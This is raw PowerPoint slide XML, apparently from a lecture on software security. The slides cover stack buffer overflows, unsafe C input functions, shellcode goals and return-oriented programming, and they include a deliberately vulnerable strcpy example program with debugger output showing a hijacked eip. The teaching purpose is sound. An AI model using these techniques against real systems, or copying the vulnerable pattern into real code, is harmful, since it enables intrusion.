                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd210	 0xffffd210</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x6c6c6166	 0x6c6c6166</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x31303220	 0x31303220e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68758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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Overflowing” Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gets() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- note that data cannot contain newlines or EOFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and also custom input routines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204473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0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0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60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0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60" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to Exploit a Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you can control %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you can turn that into arbitrary code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different variations to accommodate different architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux buffer overflows for 32-bit architectures explained in the paper “Smashing The Stack For Fun And Profit” by Aleph One, published on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 49(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420435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146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146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14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14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14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14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Shellcode Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to execute arbitrary code in the vulnerable application's process space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This code has the same privileges as the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the standard term for this type of code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called shellcode because classic example is code to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Really just assembly code to perform specific purpose</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167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114049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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> approach can be generalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of invoking whole functions, one can invoke just a snippet of code, followed by ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This technique was first introduced in 2005 to work around 64-bit architectures that require parameters to be passed using registers (the “borrowed chunks” technique, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Krahmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207016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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later, the most general ROP technique was proposed, which supports loops and conditionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: “The Geometry of Innocent Flesh on the Bone: Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without Function Calls (on the x86)”, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hovav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our thesis: In any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> techniques we introduce, to cause the exploited program to undertake arbitrary computation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194198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4" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The x86 CPU Family</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8088, 8086: 16 bit registers, real-mode only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80286: 16-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80386: 32-bit registers, 32-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80486/Pentium/Pentium Pro: Adds few features, speed-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium MMX: Introduces the multimedia extensions (MMX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium II: Pentium Pro with MMX instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium III: Speed-up, introduces the Streaming SIMD Extensions (SSE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium 4: Introduces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetBurst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Xeon: Introduces Hyper-Threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: Multiple cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMD Opteron: 64 bit architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836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1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14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14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14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14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14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147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147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0147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0147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014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3" y="305134"/>
            <a:ext cx="4840977" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo [50];   </a:t>
            </a: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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>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push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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x3c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
